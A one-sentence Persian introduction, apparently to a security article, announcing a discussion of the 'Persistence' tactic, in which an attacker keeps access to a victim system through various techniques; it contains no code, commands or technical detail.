در این مقاله به آشنایی با Tactic ای به نام Persistence میپردازیم که در آن، هدف مهاجم حفظ دسترسی خود به سیستم قربانی با Technique های مختلف میباشد